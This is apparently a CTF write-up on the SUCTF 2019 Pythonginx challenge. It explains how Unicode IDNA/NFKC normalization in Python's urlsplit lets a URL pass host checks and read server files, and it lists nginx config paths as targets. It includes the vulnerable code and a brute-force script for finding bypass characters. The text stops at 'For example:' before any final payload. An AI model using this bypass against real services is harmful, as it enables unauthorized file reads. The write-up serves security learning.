[SUCTF 2019]Pythonginx (CSDN blog)

Article link: https://blog.csdn.net/m0_53314778/article/details/113730543


Key points: nginx configuration file paths; arbitrary file read based on a Black Hat talk.
This challenge builds on the Black Hat talk HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization. The slides for the talk are here:
https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf

The challenge hints at nginx, so we need to know where nginx keeps its files:

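Configuration directory: /etc/nginx
Main configuration file: /etc/nginx/conf/nginx.conf
Management script: /usr/lib64/systemd/system/nginx.service
Modules: /usr/lib64/nginx/modules
Executable: /usr/sbin/nginx
Default web root: /usr/share/nginx/html
Default log directory: /var/log/nginx
Configuration file (installs under /usr/local/nginx): /usr/local/nginx/conf/nginx.conf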

Challenge:

The page shows a URL submission form, and its HTML source includes the server-side code:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <form method="GET" action="getUrl">
        URL:<input type="text" name="url"/>
        <input type="submit" value="Submit"/>
    </form>

    <code>
        
        @app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    # Drop everything after the first space in the URL
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
    </code>
    <!-- Dont worry about the suctf.cc. Go on! -->
    <!-- Do you know the nginx? -->
</body>
</html>

An example shows what these functions do:

>>> from urllib import parse
>>> url = 'http://www.example.com/a?b&c=1#2'
>>> host = parse.urlparse(url).hostname    # urlparse splits the URL; host is its hostname
>>> parse.urlparse(url)                    # inspect the result
ParseResult(scheme='http', netloc='www.example.com', path='/a', params='', query='b&c=1', fragment='2')
>>> host                                   # inspect host
'www.example.com'
>>> parts = list(parse.urlsplit(url))      # urlsplit also splits the URL; stored here as a list
>>> parts                                  # inspect the result
['http', 'www.example.com', '/a', 'b&c=1', '2']
>>> host = parts[1]                        # parts[1] is the netloc, here identical to the hostname
>>> host
'www.example.com'
>>> finalUrl = parse.urlunsplit(parts).split(' ')[0]    # urlunsplit joins the parts back into a URL
>>> finalUrl                                            # inspect the result
'http://www.example.com/a?b&c=1#2'
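
One detail the session above does not show: parts[1] is the netloc, not the hostname. For a plain host the two are equal, but netloc keeps the port, any userinfo, and the original letter case, while hostname drops the first two and lowercases the rest. A minimal sketch, assuming a made-up URL chosen only to make the difference visible:

```python
from urllib.parse import urlparse, urlsplit

# Hypothetical URL, chosen only to show where netloc and hostname differ
url = 'http://user@WWW.Example.com:8080/a?b&c=1#2'

netloc = urlsplit(url)[1]          # the same field the challenge reads from parts[1]
hostname = urlparse(url).hostname  # userinfo and port removed, lowercased

print(netloc)    # user@WWW.Example.com:8080
print(hostname)  # www.example.com
```

This is why the first two checks in getUrl are not strictly the same test, even though both compare against 'suctf.cc'.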

urllib: URL handling modules
urllib is a package that collects several modules for working with URLs:

urllib.request opens and reads URLs

urllib.error contains the exceptions raised by urllib.request

urllib.parse parses URLs

urllib.robotparser parses robots.txt files

encode('idna') converts a label to its internationalized domain name (IDNA) form, normalizing it along the way.
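
To see what the codec does to a single label, the sketch below encodes a few labels with Python's built-in idna codec. The codec runs nameprep, which includes NFKC normalization, before producing ASCII, so a compatibility character can come out as a plain ASCII letter. The sample labels are assumptions picked for illustration and are not taken from the challenge.

```python
# Sample labels chosen for illustration; each is encoded the same way
# the challenge code encodes h inside its loop
labels = ['suctf', 'c\u2102', 'b\u00fccher']

for label in labels:
    encoded = label.encode('idna').decode('utf-8')
    print(repr(label), '->', repr(encoded))

# U+2102 (DOUBLE-STRUCK CAPITAL C) is folded to a plain 'c' by nameprep,
# so the label needs no punycode at all
double_struck = 'c\u2102'.encode('idna').decode('utf-8')

# A label that stays non-ASCII after nameprep gets the xn-- punycode form
punycoded = 'b\u00fccher'.encode('idna').decode('utf-8')
```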

Approach:

One piece was left out of the function walkthrough above: the vulnerability in Python's urlsplit function.

CVE-2019-9636: urlsplit does not handle NFKC normalization
CVE-2019-10160: urlsplit NFKD normalization vulnerability

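How the vulnerability works:
URLs encoded with Punycode/IDNA use NFKC normalization to decompose characters. This can cause certain characters to introduce new segments into the URL.
For example, in a direct comparison \uFF03 is not equal to '#', but it normalizes to '#', which changes the fragment part of the URL. Similarly, \u2100 normalizes to 'a/c', which introduces a path segment.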
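
The two examples can be checked directly with the standard unicodedata module. This is only a small sketch of the normalization step itself, not of urlsplit's internals:

```python
import unicodedata

# The two characters named in the text above
samples = ['\uFF03', '\u2100']

for ch in samples:
    normalized = unicodedata.normalize('NFKC', ch)
    # Print the code point, its NFKC form, and whether it changed
    print('U+%04X' % ord(ch), repr(normalized), ch != normalized)

fullwidth_hash = unicodedata.normalize('NFKC', '\uFF03')  # becomes '#'
account_of = unicodedata.normalize('NFKC', '\u2100')      # becomes 'a/c'
```

A single input character can therefore turn into a URL delimiter, or into several characters including one, after normalization.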

Our goal is to reach return urllib.request.urlopen(finalUrl).read(); none of the other return statements are useful.


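The first two checks test whether host is suctf.cc, and execution continues only if it is not. The third check requires that, once each label has gone through encode('idna').decode('utf-8') and the parts have been passed to urlunsplit, the hostname it reads is suctf.cc.

In short, we need to escape the first two ifs and satisfy the third.

All three ifs test the same condition, but host is constructed differently before each one, which is exactly the point the Black Hat talk makes.

When a URL contains certain special characters, the output may not be what was expected.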
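
This can be traced for a single candidate. The sketch below follows the same steps as getUrl and records the host seen by each of the three checks. The helper name trace_hosts and the candidate character U+2102 are assumptions picked here for illustration; the code makes no network request.

```python
from urllib.parse import urlparse, urlsplit, urlunsplit


def trace_hosts(url):
    """Return the host value seen by each of the three checks in getUrl."""
    first = urlparse(url).hostname        # check 1: hostname of the raw URL
    parts = list(urlsplit(url))
    second = parts[1]                     # check 2: raw netloc
    # Same per-label IDNA round trip as the challenge code
    parts[1] = '.'.join(h.encode('idna').decode('utf-8')
                        for h in second.split('.'))
    final_url = urlunsplit(parts).split(' ')[0]
    third = urlparse(final_url).hostname  # check 3: hostname after the IDNA step
    return first, second, third


# Illustrative candidate: U+2102 is not 'c' until the IDNA step normalizes it
first, second, third = trace_hosts('http://suctf.c\u2102/')
print(repr(first), repr(second), repr(third))
```

For this candidate the first two values still contain the original character, while the third is the plain ASCII host, so only the last comparison succeeds.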

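Solution 1:

Next, we only need to write a brute-force script modeled on the getUrl function to find inputs that escape the checks.
A script borrowed from an expert: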

from urllib.parse import urlparse, urlsplit, urlunsplit


def get_unicode():
    # Try every BMP code point as the final character of the host
    for x in range(65536):
        uni = chr(x)
        url = "http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: " + uni + " unicode: \\u" + format(x, "04x"))
        except Exception:
            # Some code points raise (for example surrogates in the idna
            # codec, or netlocs that patched Python versions reject in
            # urlsplit); skip them
            pass


def getUrl(url):
    # Mirrors the three checks in the challenge's getUrl
    host = urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = urlparse(finalUrl).hostname
    # True only when the rebuilt URL's hostname is suctf.cc
    return host == 'suctf.cc'


if __name__ == '__main__':
    get_unicode()

The script prints the characters that pass all three checks.
We only need to use any one of them to read a file.
For example: